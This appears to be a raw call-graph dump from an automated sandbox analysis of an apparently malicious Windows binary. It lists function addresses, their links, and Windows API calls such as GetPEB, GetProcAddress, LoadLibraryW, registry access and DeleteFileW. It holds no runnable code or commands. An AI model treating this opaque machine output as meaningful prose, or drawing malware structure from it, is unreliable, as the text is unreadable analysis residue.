8621 408b45 6 API calls 8621->8625 8622 4059d8 GetProcessHeap RtlAllocateHeap GetProcAddress GetPEB 8622->8625 8623 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap RtlFreeHeap 8623->8625 8624 402bab GetProcessHeap RtlFreeHeap 8624->8625 8625->8620 8625->8621 8625->8622 8625->8623 8625->8624 8627 4040bb 13 API calls 8626->8627 8634 4096a9 8627->8634 8628 40989f 8628->8485 8629 409896 8630 403f9e 5 API calls 8629->8630 8630->8628 8632 408b45 6 API calls 8632->8634 8633 402bab GetProcessHeap RtlFreeHeap 8633->8634 8634->8628 8634->8629 8634->8632 8634->8633 8635 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap RtlFreeHeap 8634->8635 8884 4059d8 8634->8884 8635->8634 8637 4040bb 13 API calls 8636->8637 8644 4098c1 8637->8644 8638 4099fb 8638->8480 8639 4099f3 8640 403f9e 5 API calls 8639->8640 8640->8638 8641 402bab GetProcessHeap RtlFreeHeap 8641->8644 8642 4059d8 4 API calls 8642->8644 8643 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap RtlFreeHeap 8643->8644 8644->8638 8644->8639 8644->8641 8644->8642 8644->8643 8646 4031e5 4 API calls 8645->8646 8647 406441 GetNativeSystemInfo 8646->8647 8647->8502 8649 4031e5 4 API calls 8648->8649 8652 40480a 8649->8652 8650 40485d 8650->8503 8650->8506 8651 4031e5 4 API calls 8651->8652 8652->8650 8652->8651 8653 40484f 8652->8653 8654 403c40 5 API calls 8653->8654 8654->8650 8656 4031e5 4 API calls 8655->8656 8657 40a435 8656->8657 8657->8520 8659 4031e5 4 API calls 8658->8659 8660 40a451 8659->8660 8660->8534 8662 4031e5 4 API calls 8661->8662 8663 40487c 8662->8663 8663->8605 8664 406c4c 8663->8664 8725 4068eb 8664->8725 8666 406e02 8666->8609 8667 406cab 8737 40469b 8667->8737 8668 406c6c 8668->8666 8668->8667 8734 406894 8668->8734 8675 406df1 8676 40469b 4 API calls 8675->8676 8676->8666 8677 406cef 8677->8675 8678 4031e5 4 API calls 8677->8678 8679 406d26 8678->8679 8679->8675 8680 40771e 6 API calls 8679->8680 8684 406d57 8680->8684 8681 406da2 8682 4031e5 4 API calls 8681->8682 8682->8675 8684->8681 8750 4068b0 8684->8750 8686 4126bb 8685->8686 8687 4126d1 8685->8687 8689 412840 8686->8689 8806 40488c 8686->8806 8687->8689 8812 407055 8687->8812 8689->8605 8692 412837 8694 403c40 5 API calls 8692->8694 8694->8689 8696 41281e 8697 4070ff 6 API calls 8696->8697 8697->8692 8698 407055 6 API calls 8699 412742 8698->8699 8699->8696 8700 40719a 6 API calls 8699->8700 8701 41276e 8700->8701 8702 412804 8701->8702 8828 406f4a 8701->8828 8856 4070ff 8702->8856 8705 41279a 8834 412553 8705->8834 8878 405907 8715->8878 8717 405a61 8718 405a76 8717->8718 8719 405907 4 API calls 8717->8719 8718->8533 8719->8717 8721 402b7c 2 API calls 8720->8721 8722 405a99 8721->8722 8724 405ade 8722->8724 8881 40595e 8722->8881 8724->8552 8753 4076a8 8725->8753 8727 406913 8728 406a61 8727->8728 8729 40771e 6 API calls 8727->8729 8728->8668 8730 406949 8729->8730 8730->8728 8731 40771e 6 API calls 8730->8731 8732 404678 4 API calls 8730->8732 8759 4046c2 8730->8759 8731->8730 8732->8730 8735 4031e5 4 API calls 8734->8735 8736 4068a6 8735->8736 8736->8668 8738 4046b4 8737->8738 8739 4046a4 8737->8739 8738->8666 8741 404678 8738->8741 8740 4031e5 4 API calls 8739->8740 8740->8738 8742 4031e5 4 API calls 8741->8742 8743 40468b 8742->8743 8743->8666 8744 40771e 8743->8744 8745 407737 8744->8745 8749 407748 8744->8749 8746 407644 6 API calls 8745->8746 8747 407741 8746->8747 8748 406baa 6 API calls 8747->8748 8748->8749 8749->8677 8751 4031e5 4 API calls 8750->8751 8752 4068c2 8751->8752 8752->8684 8754 4076c1 8753->8754 8755 4076d2 8753->8755 8767 407644 8754->8767 8755->8727 8760 4046d3 8759->8760 8761 4046d9 8759->8761 8802 40464c 8760->8802 8763 404678 4 API calls 8761->8763 8766 4046e9 8761->8766 8763->8766 8764 404714 8764->8730 8765 40469b 4 API calls 8765->8764 8766->8764 8766->8765 8768 407653 8767->8768 8769 407661 8767->8769 8768->8769 8775 406a6b 8768->8775 8771 406baa 8769->8771 8772 406bbb 8771->8772 8774 406bc8 8771->8774 8772->8774 8783 407402 8772->8783 8774->8755 8779 406a81 8775->8779 8776 402b7c 2 API calls 8776->8779 8777 406b8b 8777->8769 8778 406894 4 API calls 8778->8779 8779->8776 8779->8777 8779->8778 8780 406b96 8779->8780 8781 402bab 2 API calls 8779->8781 8782 402bab 2 API calls 8780->8782 8781->8779 8782->8777 8784 407644 6 API calls 8783->8784 8785 407412 8784->8785 8786 402b7c 2 API calls 8785->8786 8793 407450 8785->8793 8787 407483 8786->8787 8788 402b7c 2 API calls 8787->8788 8787->8793 8790 4074ce 8788->8790 8789 4074da 8791 4068cc 2 API calls 8789->8791 8790->8789 8792 402b7c 2 API calls 8790->8792 8791->8793 8796 40751f 8792->8796 8793->8774 8794 40752b 8795 4068cc 2 API calls 8794->8795 8795->8789 8796->8794 8798 4068cc 8796->8798 8799 4068d6 8798->8799 8800 4068e3 8798->8800 8799->8800 8801 402bab GetProcessHeap RtlFreeHeap 8799->8801 8800->8794 8801->8800 8803 404666 8802->8803 8804 404659 8802->8804 8803->8761 8805 4031e5 4 API calls 8804->8805 8805->8803 8807 4047e6 5 API calls 8806->8807 8808 404897 8807->8808 8809 40489c 8808->8809 8864 4047c7 8808->8864 8809->8687 8813 40706f 8812->8813 8814 407084 8812->8814 8813->8814 8815 407644 6 API calls 8813->8815 8819 4070e4 8814->8819 8867 406fd2 8814->8867 8816 40707d 8815->8816 8818 406baa 6 API calls 8816->8818 8818->8814 8819->8692 8820 40719a 8819->8820 8821 4071b0 8820->8821 8825 4071c5 8820->8825 8822 407644 6 API calls 8821->8822 8821->8825 8823 4071be 8822->8823 8824 406baa 6 API calls 8823->8824 8824->8825 8826 406fd2 4 API calls 8825->8826 8827 407226 8825->8827 8826->8827 8827->8696 8827->8698 8829 406f64 8828->8829 8833 406f75 8828->8833 8830 407644 6 API calls 8829->8830 8831 406f6e 8830->8831 8832 406baa 6 API calls 8831->8832 8832->8833 8833->8705 8875 4060ac 8834->8875 8857 407116 8856->8857 8858 40712b 8856->8858 8857->8858 8859 407644 6 API calls 8857->8859 8861 406fd2 4 API calls 8858->8861 8863 407187 8858->8863 8860 407124 8859->8860 8862 406baa 6 API calls 8860->8862 8861->8863 8862->8858 8863->8696 8865 4031e5 4 API calls 8864->8865 8866 4047d9 8865->8866 8866->8687 8868 406fde 8867->8868 8869 407027 8868->8869 8870 4031e5 4 API calls 8868->8870 8869->8819 8871 406ffa 8870->8871 8872 4031e5 4 API calls 8871->8872 8873 407011 8872->8873 8874 4031e5 4 API calls 8873->8874 8874->8869 8876 4031e5 4 API calls 8875->8876 8877 4060bb 8876->8877 8877->8877 8879 4031e5 4 API calls 8878->8879 8880 40591a 8879->8880 8880->8717 8882 4031e5 4 API calls 8881->8882 8883 405971 8882->8883 8883->8722 8885 4031e5 4 API calls 8884->8885 8886 4059ed 8885->8886 8887 402b7c 2 API calls 8886->8887 8890 405a38 8886->8890 8888 405a16 8887->8888 8889 4031e5 4 API calls 8888->8889 8888->8890 8889->8890 8890->8634 8892 4031e5 4 API calls 8891->8892 8893 4044b9 8892->8893 8893->8492 9813 40a349 9814 4098a7 14 API calls 9813->9814 9815 40a359 9814->9815 9052 408952 9073 40823f 9052->9073 9055 408960 9057 4056bf 2 API calls 9055->9057 9058 40896a 9057->9058 9101 408862 9058->9101 9060 413aca 4 API calls 9061 4089d4 9060->9061 9063 405695 2 API calls 9061->9063 9062 408975 9070 4089c4 9062->9070 9109 4087d6 9062->9109 9065 4089df 9063->9065 9070->9060 9071 402bab 2 API calls 9072 40899d 9071->9072 9072->9070 9072->9071 9074 40824d 9073->9074 9075 40831b 9074->9075 9076 4031e5 4 API calls 9074->9076 9075->9055 9089 4083bb 9075->9089 9077 40826d 9076->9077 9078 4031e5 4 API calls 9077->9078 9079 408289 9078->9079 9080 4031e5 4 API calls 9079->9080 9081 4082a5 9080->9081 9082 4031e5 4 API calls 9081->9082 9083 4082c1 9082->9083 9084 4031e5 4 API calls 9083->9084 9085 4082e2 9084->9085 9086 4031e5 4 API calls 9085->9086 9087 4082ff 9086->9087 9088 4031e5 4 API calls 9087->9088 9088->9075 9137 408363 9089->9137 9092 4056bf 2 API calls 9098 4083f4 9092->9098 9093 413aca 4 API calls 9094 4084a0 9093->9094 9095 405695 2 API calls 9094->9095 9096 4084ab 9095->9096 9096->9055 9097 408492 9097->9093 9098->9097 9140 40815d 9098->9140 9155 40805d 9098->9155 9170 404b8f 9101->9170 9103 408946 9103->9062 9104 4031e5 4 API calls 9106 40887e 9104->9106 9105 40893e 9173 404a39 9105->9173 9106->9103 9106->9104 9106->9105 9108 402b7c 2 API calls 9106->9108 9108->9106 9110 402b7c 2 API calls 9109->9110 9111 4087e7 9110->9111 9112 4031e5 4 API calls 9111->9112 9117 40885a 9111->9117 9115 408802 9112->9115 9113 408853 9114 402bab 2 API calls 9113->9114 9114->9117 9115->9113 9118 40884d 9115->9118 9182 408522 9115->9182 9186 4084b4 9115->9186 9121 408749 9117->9121 9189 4084d4 9118->9189 9122 404b8f 5 API calls 9121->9122 9127 408765 9122->9127 9123 4087cf 9129 4085d1 9123->9129 9124 4031e5 4 API calls 9124->9127 9125 408522 4 API calls 9125->9127 9126 4087c7 9128 404a39 5 API calls 9126->9128 9127->9123 9127->9124 9127->9125 9127->9126 9128->9123 9130 4086c2 9129->9130 9131 4085e9 9129->9131 9130->9072 9131->9130 9133 402bab 2 API calls 9131->9133 9134 4031e5 4 API calls 9131->9134 9195 4089e6 9131->9195 9214 4086c9 9131->9214 9218 4036a3 9131->9218 9133->9131 9134->9131 9138 4031e5 4 API calls 9137->9138 9139 408386 9138->9139 9139->9092 9139->9096 9141 40816f 9140->9141 9142 4081b6 9141->9142 9143 4081fd 9141->9143 9154 4081ef 9141->9154 9145 405872 4 API calls 9142->9145 9144 405872 4 API calls 9143->9144 9146 408213 9144->9146 9147 4081cf 9145->9147 9148 405872 4 API calls 9146->9148 9149 405872 4 API calls 9147->9149 9151 408222 9148->9151 9150 4081df 9149->9150 9152 405872 4 API calls 9150->9152 9153 405872 4 API calls 9151->9153 9152->9154 9153->9154 9154->9098 9156 40808c 9155->9156 9157 4080d2 9156->9157 9158 408119 9156->9158 9169 40810b 9156->9169 9160 405872 4 API calls 9157->9160 9159 405872 4 API calls 9158->9159 9161 40812f 9159->9161 9162 4080eb 9160->9162 9163 405872 4 API calls 9161->9163 9164 405872 4 API calls 9162->9164 9165 40813e 9163->9165 9166 4080fb 9164->9166 9168 405872 4 API calls 9165->9168 9167 405872 4 API calls 9166->9167 9167->9169 9168->9169 9169->9098 9176 404a19 9170->9176 9172 404ba0 9172->9106 9179 4049ff 9173->9179 9175 404a44 9175->9103 9177 4031e5 4 API calls 9176->9177 9178 404a2c RegOpenKeyW 9177->9178 9178->9172 9180 4031e5 4 API calls 9179->9180 9181 404a12 RegCloseKey 9180->9181 9181->9175 9184 408534 9182->9184 9183 4085af 9183->9115 9184->9183 9192 4084ee 9184->9192 9187 4031e5 4 API calls 9186->9187 9188 4084c7 9187->9188 9188->9115 9190 4031e5 4 API calls 9189->9190 9191 4084e7 9190->9191 9191->9113 9193 4031e5 4 API calls 9192->9193 9194 408501 9193->9194 9194->9183 9196 4031e5 4 API calls 9195->9196 9197 408a06 9196->9197 9198 408b21 9197->9198 9199 4031e5 4 API calls 9197->9199 9198->9131 9202 408a32 9199->9202 9200 408b17 9230 403649 9200->9230 9202->9200 9221 403666 9202->9221 9205 4031e5 4 API calls 9207 408a88 9205->9207 9208 4031e5 4 API calls 9207->9208 9213 408b0e 9207->9213 9209 408ac4 9208->9209 9210 405b6f 6 API calls 9209->9210 9211 408aff 9210->9211 9211->9213 9224 408508 9211->9224 9227 40362f 9213->9227 9215 408744 9214->9215 9216 4086e2 9214->9216 9215->9131 9216->9215 9217 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap RtlFreeHeap 9216->9217 9217->9216 9219 4031e5 4 API calls 9218->9219 9220 4036b5 9219->9220 9220->9131 9222 4031e5 4 API calls 9221->9222 9223 403679 9222->9223 9223->9205 9223->9213 9225 4031e5 4 API calls 9224->9225 9226 40851b 9225->9226 9226->9213 9228 4031e5 4 API calls 9227->9228 9229 403642 9228->9229 9229->9200 9231 4031e5 4 API calls 9230->9231 9232 40365c 9231->9232 9232->9198 9833 40f252 9834 404bee 6 API calls 9833->9834 9835 40f269 9834->9835 9836 404bee 6 API calls 9835->9836 9847 40f2ff 9835->9847 9837 40f282 9836->9837 9838 404bee 6 API calls 9837->9838 9839 40f290 9838->9839 9850 404c4e 9839->9850 9841 40f2a7 9842 405872 4 API calls 9841->9842 9841->9847 9843 40f2cd 9842->9843 9844 405872 4 API calls 9843->9844 9845 40f2dc 9844->9845 9846 405872 4 API calls 9845->9846 9848 40f2ee 9846->9848 9849 405762 4 API calls 9848->9849 9849->9847 9851 402b7c 2 API calls 9850->9851 9853 404c60 9851->9853 9852 404ca4 9852->9841 9853->9852 9854 4031e5 4 API calls 9853->9854 9855 404c8d 9854->9855 9855->9852 9856 402bab 2 API calls 9855->9856 9856->9852 9857 41045c 9858 4040bb 13 API calls 9857->9858 9859 410477 9858->9859 9860 41060b 9859->9860 9888 407851 9859->9888 9862 41048f 9864 407851 2 API calls 9862->9864 9869 410604 9862->9869 9863 403f9e 5 API calls 9863->9860 9865 4104a9 9864->9865 9870 4105e0 9865->9870 9871 405ae9 6 API calls 9865->9871 9873 41056f 9865->9873 9874 4105eb 9865->9874 9866 402bab 2 API calls 9868 4105fb 9866->9868 9867 402bab 2 API calls 9867->9869 9868->9867 9869->9863 9872 402bab 2 API calls 9870->9872 9870->9874 9871->9865 9872->9874 9873->9870 9875 4105d6 9873->9875 9877 412269 6 API calls 9873->9877 9874->9866 9874->9868 9876 402bab 2 API calls 9875->9876 9876->9870 9878 410580 9877->9878 9878->9875 9879 405872 4 API calls 9878->9879 9880 410599 9879->9880 9881 405872 4 API calls 9880->9881 9882 4105a9 9881->9882 9883 405872 4 API calls 9882->9883 9884 4105bb 9883->9884 9885 405872 4 API calls 9884->9885 9886 4105cd 9885->9886 9887 402bab 2 API calls 9886->9887 9887->9875 9889 407866 9888->9889 9890 402b7c 2 API calls 9889->9890 9891 407899 9889->9891 9890->9891 9891->9862 9294 40f561 9297 40f4b6 9294->9297 9298 413b28 6 API calls 9297->9298 9299 40f4bf 9298->9299 9300 405b6f 6 API calls 9299->9300 9301 402bab GetProcessHeap RtlFreeHeap 9299->9301 9302 413a58 14 API calls 9299->9302 9303 40f559 9299->9303 9300->9299 9301->9299 9302->9299 9307 403b64 9308 4031e5 4 API calls 9307->9308 9309 403b77 PathFileExistsW 9308->9309 9923 40d069 9924 404bee 6 API calls 9923->9924 9925 40d080 9924->9925 9926 404bee 6 API calls 9925->9926 9948 40d1e2 9925->9948 9927 40d099 9926->9927 9928 404bee 6 API calls 9927->9928 9929 40d0a7 9928->9929 9964 404ba7 9929->9964 9932 404bee 6 API calls 9933 40d0c5 9932->9933 9934 404c4e 6 API calls 9933->9934 9935 40d0dc 9934->9935 9936 404bee 6 API calls 9935->9936 9937 40d0eb 9936->9937 9938 404ba7 4 API calls 9937->9938 9939 40d0fa 9938->9939 9940 404bee 6 API calls 9939->9940 9941 40d109 9940->9941 9942 404c4e 6 API calls 9941->9942 9943 40d123 9942->9943 9944 405872 4 API calls 9943->9944 9943->9948 9945 40d14a 9944->9945 9946 405872 4 API calls 9945->9946 9947 40d159 9946->9947 9949 405872 4 API calls 9947->9949 9950 40d16b 9949->9950 9951 405781 4 API calls 9950->9951 9952 40d179 9951->9952 9953 405872 4 API calls 9952->9953 9954 40d18b 9953->9954 9955 405762 4 API calls 9954->9955 9956 40d19f 9955->9956 9957 405872 4 API calls 9956->9957 9958 40d1b1 9957->9958 9959 405781 4 API calls 9958->9959 9960 40d1bf 9959->9960 9961 405872 4 API calls 9960->9961 9962 40d1d1 9961->9962 9963 405762 4 API calls 9962->9963 9963->9948 9965 4031e5 4 API calls 9964->9965 9966 404bca 9965->9966 9966->9932 9336 40f16e 9337 4056bf 2 API calls 9336->9337 9338 40f17b 9337->9338 9339 412093 21 API calls 9338->9339 9340 40f19e 9339->9340 9341 412093 21 API calls 9340->9341 9342 40f1b6 9341->9342 9343 412093 21 API calls 9342->9343 9344 40f1cc 9343->9344 9345 412093 21 API calls 9344->9345 9346 40f1e2 9345->9346 9347 413aca 4 API calls 9346->9347 9348 40f1ef 9347->9348 9349 405695 2 API calls 9348->9349 9350 40f1fa 9349->9350 9351 40ce71 9352 413b28 6 API calls 9351->9352 9353 40ce78 9352->9353 9354 405b6f 6 API calls 9353->9354 9355 40ce83 9354->9355 9359 40ceba 9355->9359 9362 403d74 20 API calls 9355->9362 9363 40cec1 9355->9363 9356 403fbf 7 API calls 9357 40cecc 9356->9357 9358 40cefb 9357->9358 9361 403d74 20 API calls 9357->9361 9360 402bab 2 API calls 9359->9360 9360->9363 9364 40cee7 9361->9364 9365 40cead 9362->9365 9363->9356 9366 40cef4 9364->9366 9369 402bab 2 API calls 9364->9369 9365->9359 9368 402bab 2 API calls 9365->9368 9367 402bab 2 API calls 9366->9367 9367->9358 9368->9359 9369->9366 9370 406472 9371 4031e5 4 API calls 9370->9371 9372 406484 Sleep 9371->9372 10040 40f204 10041 405781 4 API calls 10040->10041 10042 40f214 10041->10042 10043 4057df 14 API calls 10042->10043 10044 40f226 10043->10044 9430 403c08 9431 4031e5 4 API calls 9430->9431 9432 403c1a DeleteFileW 9431->9432 9433 410a09 9434 41219c 15 API calls 9433->9434 9435 410a1b 9434->9435 9436 41219c 15 API calls 9435->9436 9437 410a23 9436->9437 9438 41219c 15 API calls 9437->9438 9439 410a2c 9438->9439 9440 41219c 15 API calls 9439->9440 9441 410a38 9440->9441 9442 404b22 6 API calls 9441->9442 9443 410a4c 9442->9443 9444 403fbf 7 API calls 9443->9444 9450 410a7a 9443->9450 9445 410a5c 9444->9445 9446 410a71 9445->9446 9447 413a58 14 API calls 9445->9447 9448 402bab 2 API calls 9446->9448 9449 410a6b 9447->9449 9448->9450 9451 402bab 2 API calls 9449->9451 9451->9446 10045 410d09 10046 410d56 10045->10046 10047 410d17 10045->10047 10049 413a58 14 API calls 10046->10049 10061 406642 10047->10061 10051 410d6f 10049->10051 10052 4056bf 2 API calls 10053 410d2e 10052->10053 10074 405641 10053->10074 10055 410d41 10056 413aca 4 API calls 10055->10056 10057 410d4a 10056->10057 10058 405695 2 API calls 10057->10058 10059 410d50 10058->10059 10060 4036a3 4 API calls 10059->10060 10060->10046 10062 406662 10061->10062 10063 4031e5 4 API calls 10062->10063 10064 406676 10063->10064 10078 4066bf 10064->10078 10069 4066b1 10072 4036a3 4 API calls 10069->10072 10070 4066a7 10071 4036a3 4 API calls 10070->10071 10073 4066ac 10071->10073 10072->10073 10073->10046 10073->10052 10075 40564d 10074->10075 10076 405673 10074->10076 10075->10076 10077 4056fc 4 API calls 10075->10077 10076->10055 10077->10076 10079 4031e5 4 API calls 10078->10079 10080 4066dc 10079->10080 10081 4066f6 SetLastError 10080->10081 10082 406708 GetLastError 10080->10082 10099 406693 10081->10099 10083 406713 10082->10083 10082->10099 10084 4031e5 4 API calls 10083->10084 10085 406725 10084->10085 10086 4031e5 4 API calls 10085->10086 10085->10099 10087 40673f 10086->10087 10088 406753 10087->10088 10089 406749 10087->10089 10091 4031e5 4 API calls 10088->10091 10090 4036a3 4 API calls 10089->10090 10090->10099 10092 406761 10091->10092 10093 40678a 10092->10093 10094 40677c 10092->10094 10096 4036a3 4 API calls 10093->10096 10095 4036a3 4 API calls 10094->10095 10097 406781 10095->10097 10096->10099 10098 4036a3 4 API calls 10097->10098 10098->10099 10100 406455 10099->10100 10101 4031e5 4 API calls 10100->10101 10102 406468 10101->10102 10102->10069 10102->10070 9452 40c509 9453 412093 21 API calls 9452->9453 9454 40c51e 9453->9454 9461 40910d 9462 404b22 6 API calls 9461->9462 9463 409124 9462->9463 9464 40917a 9463->9464 9465 405b6f 6 API calls 9463->9465 9466 40913e 9465->9466 9468 404b22 6 API calls 9466->9468 9472 409173 9466->9472 9467 402bab 2 API calls 9467->9464 9469 409153 9468->9469 9471 409408 16 API calls 9469->9471 9475 40916a 9469->9475 9470 402bab 2 API calls 9470->9472 9473 409164 9471->9473 9472->9467 9474 402bab 2 API calls 9473->9474 9474->9475 9475->9470 9479 410410 9480 4056bf 2 API calls 9479->9480 9481 41041b 9480->9481 9482 412093 21 API calls 9481->9482 9483 41043c 9482->9483 9484 413aca 4 API calls 9483->9484 9485 410449 9484->9485 9486 405695 2 API calls 9485->9486 9487 410454 9486->9487 9514 40c71a 9515 41219c 15 API calls 9514->9515 9516 40c728 9515->9516 10158 410b1a 10159 404bee 6 API calls 10158->10159 10161 410b31 10159->10161 10160 410c6d 10161->10160 10162 404bee 6 API calls 10161->10162 10163 410b5a 10162->10163 10164 404bee 6 API calls 10163->10164 10165 410b69 10164->10165 10166 404bee 6 API calls 10165->10166 10167 410b78 10166->10167 10168 404ba7 4 API calls 10167->10168 10169 410b86 10168->10169 10170 404ba7 4 API calls 10169->10170 10171 410b95 10170->10171 10171->10160 10172 405872 4 API calls 10171->10172 10173 410bd7 10172->10173 10174 405872 4 API calls 10173->10174 10175 410be8 10174->10175 10176 405872 4 API calls 10175->10176 10177 410bf9 10176->10177 10178 405781 4 API calls 10177->10178 10179 410c07 10178->10179 10180 405781 4 API calls 10179->10180 10184 410c15 10180->10184 10181 410c4e 10182 405762 4 API calls 10181->10182 10183 410c60 10182->10183 10183->10160 10185 403f9e 5 API calls 10183->10185 10184->10181 10191 405e5a 10184->10191 10185->10160 10188 4040bb 13 API calls 10189 410c44 10188->10189 10190 402bab 2 API calls 10189->10190 10190->10181 10192 402b7c 2 API calls 10191->10192 10193 405e72 10192->10193 10194 4031e5 4 API calls 10193->10194 10197 405ea3 10193->10197 10195 405e94 10194->10195 10196 402bab 2 API calls 10195->10196 10195->10197 10196->10197 10197->10181 10197->10188 10198 40f81c 10199 404bee 6 API calls 10198->10199 10200 40f833 10199->10200 10201 404bee 6 API calls 10200->10201 10215 40f94f 10200->10215 10202 40f85c 10201->10202 10203 404bee 6 API calls 10202->10203 10204 40f86b 10203->10204 10205 404bee 6 API calls 10204->10205 10206 40f87a 10205->10206 10207 404bee 6 API calls 10206->10207 10208 40f888 10207->10208 10209 404ba7 4 API calls 10208->10209 10210 40f897 10209->10210 10211 405872 4 API calls 10210->10211 10210->10215 10212 40f8d8 10211->10212 10213 405872 4 API calls 10212->10213 10214 40f8ea 10213->10214 10216 405872 4 API calls 10214->10216 10217 40f8fa 10216->10217 10218 405872 4 API calls 10217->10218 10219 40f90c 10218->10219 10220 405781 4 API calls 10219->10220 10221 40f91d 10220->10221 10222 4040bb 13 API calls 10221->10222 10223 40f92d 10222->10223 10224 405762 4 API calls 10223->10224 10225 40f93f 10224->10225 10225->10215 10226 403f9e 5 API calls 10225->10226 10226->10215 9529 402c1f 9530 4031e5 4 API calls 9529->9530 9531 402c31 LoadLibraryW 9530->9531 10236 407e1f 10237 407e2c 10236->10237 10240 407e61 10236->10240 10241 407e3e 10237->10241 10243 402bab 2 API calls 10237->10243 10245 407e51 10237->10245 10238 407eb6 10238->10245 10246 402bab 2 API calls 10238->10246 10239 407ed4 10240->10238 10247 405872 4 API calls 10240->10247 10253 407ea6 10240->10253 10241->10239 10244 402bab 2 API calls 10241->10244 10242 402bab 2 API calls 10242->10238 10243->10241 10244->10245 10245->10239 10248 402bab 2 API calls 10245->10248 10246->10245 10249 407e86 10247->10249 10248->10239 10250 405872 4 API calls 10249->10250 10251 407e96 10250->10251 10252 405872 4 API calls 10251->10252 10252->10253 10253->10238 10253->10242 9544 405924 9545 4031e5 4 API calls 9544->9545 9546 405937 StrStrW 9545->9546 10262 410927 10263 4044ee 7 API calls 10262->10263 10264 41093d 10263->10264 10265 4109a4 10264->10265 10266 4056bf 2 API calls 10264->10266 10269 410954 10266->10269 10267 4044ee 7 API calls 10267->10269 10269->10267 10270 410990 10269->10270 10271 402bab 2 API calls 10269->10271 10277 41080e 10269->10277 10272 413aca 4 API calls 10270->10272 10271->10269 10273 410998 10272->10273 10274 405695 2 API calls 10273->10274 10275 41099e 10274->10275 10276 402bab 2 API calls 10275->10276 10276->10265 10278 410821 10277->10278 10288 41091f 10278->10288 10289 410701 10278->10289 10281 405872 4 API calls 10282 410900 10281->10282 10283 405872 4 API calls 10282->10283 10284 41090d 10283->10284 10285 405872 4 API calls 10284->10285 10286 410919 10285->10286 10287 402bab 2 API calls 10286->10287 10287->10288 10288->10269 10290 405f08 4 API calls 10289->10290 10292 410713 10290->10292 10291 410804 10291->10281 10291->10288 10292->10291 10293 402b7c 2 API calls 10292->10293 10294 410748 10293->10294 10296 402b7c 2 API calls 10294->10296 10298 4107fd 10294->10298 10295 402bab 2 API calls 10295->10291 10299 4107ad 10296->10299 10297 402bab 2 API calls 10297->10298 10298->10295 10299->10297 10300 40d726 10301 404bee 6 API calls 10300->10301 10302 40d73f 10301->10302 10303 40db63 10302->10303 10304 405872 4 API calls 10302->10304 10307 40d761 10304->10307 10305 404bee 6 API calls 10305->10307 10306 405872 4 API calls 10306->10307 10307->10305 10307->10306 10309 40d971 10307->10309 10308 404ba7 4 API calls 10308->10309 10309->10308 10310 405781 4 API calls 10309->10310 10314 40d9bb 10309->10314 10310->10309 10311 404c4e 6 API calls 10311->10314 10312 405781 4 API calls 10312->10314 10313 4037be 4 API calls 10313->10314 10314->10303 10314->10311 10314->10312 10314->10313 10315 405872 4 API calls 10314->10315 10315->10314 9602 40f12f 9603 41219c 15 API calls 9602->9603 9604 40f13f 9603->9604 9605 41219c 15 API calls 9604->9605 9606 40f14c 9605->9606 9607 41219c 15 API calls 9606->9607 9608 40f159 9607->9608 9609 41219c 15 API calls 9608->9609 9610 40f166 9609->9610 9617 40ed35 9618 4056bf 2 API calls 9617->9618 9619 40ed42 9618->9619 9620 412093 21 API calls 9619->9620 9621 40ed63 9620->9621 9622 412093 21 API calls 9621->9622 9623 40ed73 9622->9623 9624 413aca 4 API calls 9623->9624 9625 40ed80 9624->9625 9626 405695 2 API calls 9625->9626 9627 40ed8e 9626->9627 8071 40f3c5 8076 41219c 8071->8076 8074 41219c 15 API calls 8075 40f3e1 8074->8075 8077 4121b1 8076->8077 8093 40f3d3 8076->8093 8078 4121be 8077->8078 8082 4121c5 8077->8082 8124 413ba4 8078->8124 8080 4121ca 8094 404056 8080->8094 8082->8080 8087 412210 8082->8087 8083 4121c3 8083->8093 8101 405b6f 8083->8101 8086 41224d 8091 402bab 2 API calls 8086->8091 8086->8093 8087->8093 8129 403fbf 8087->8129 8091->8093 8093->8074 8140 402b7c GetProcessHeap RtlAllocateHeap 8094->8140 8096 404066 8098 404095 8096->8098 8142 4031e5 8096->8142 8098->8083 8100 402bab 2 API calls 8100->8098 8102 405b7d 8101->8102 8103 402b7c 2 API calls 8102->8103 8104 405b99 8103->8104 8113 405c02 8104->8113 8178 4059b8 8104->8178 8106 405c09 8108 402bab 2 API calls 8106->8108 8107 405bba 8107->8106 8109 402b7c 2 API calls 8107->8109 8108->8113 8110 405bdd 8109->8110 8110->8106 8111 405be4 8110->8111 8112 402bab 2 API calls 8111->8112 8112->8113 8113->8086 8114 413a58 8113->8114 8115 413a63 8114->8115 8123 412245 8114->8123 8115->8123 8181 405781 8115->8181 8118 405781 4 API calls 8119 413aa0 8118->8119 8184 4057df 8119->8184 8122 405781 4 API calls 8122->8123 8137 402bab 8123->8137 8125 413bad 8124->8125 8126 404056 6 API calls 8125->8126 8128 413bb8 8125->8128 8127 413bc5 8126->8127 8127->8083 8128->8083 8130 402b7c 2 API calls 8129->8130 8131 403fcf 8130->8131 8136 403ff4 8131->8136 8303 403b98 8131->8303 8134 403ff8 GetLastError 8135 402bab 2 API calls 8134->8135 8135->8136 8136->8083 8138 402bb4 GetProcessHeap RtlFreeHeap 8137->8138 8139 402bc6 8137->8139 8138->8139 8139->8086 8141 402b98 8140->8141 8141->8096 8143 4031f3 8142->8143 8144 403236 8142->8144 8143->8144 8147 403208 8143->8147 8153 4030a5 8144->8153 8146 403224 8149 403258 8146->8149 8151 4031e5 4 API calls 8146->8151 8159 403263 8147->8159 8149->8098 8149->8100 8150 40320d 8150->8149 8152 4030a5 4 API calls 8150->8152 8151->8149 8152->8146 8165 402ca4 8153->8165 8155 4030b0 8156 4030b5 8155->8156 8169 4030c4 8155->8169 8156->8146 8160 40326d 8159->8160 8161 402b7c 2 API calls 8160->8161 8164 4032b7 8160->8164 8162 40328c 8161->8162 8163 402b7c 2 API calls 8162->8163 8163->8164 8164->8150 8166 403079 8165->8166 8167 40307c 8166->8167 8173 40317b GetPEB 8166->8173 8167->8155 8171 4030eb 8169->8171 8170 4030c0 8170->8146 8171->8170 8175 402c03 8171->8175 8174 40319b 8173->8174 8174->8167 8176 4031e5 3 API calls 8175->8176 8177 402c15 GetProcAddress 8176->8177 8177->8170 8179 4031e5 4 API calls 8178->8179 8180 4059cb 8179->8180 8180->8107 8199 405797 8181->8199 8183 405792 8183->8118 8185 405832 8184->8185 8186 4057eb 8184->8186 8185->8122 8185->8123 8186->8185 8209 4040bb 8186->8209 8189 405839 8191 405853 8189->8191 8236 405627 8189->8236 8190 40582c 8233 403f9e 8190->8233 8247 405762 8191->8247 8197 403f9e 5 API calls 8197->8185 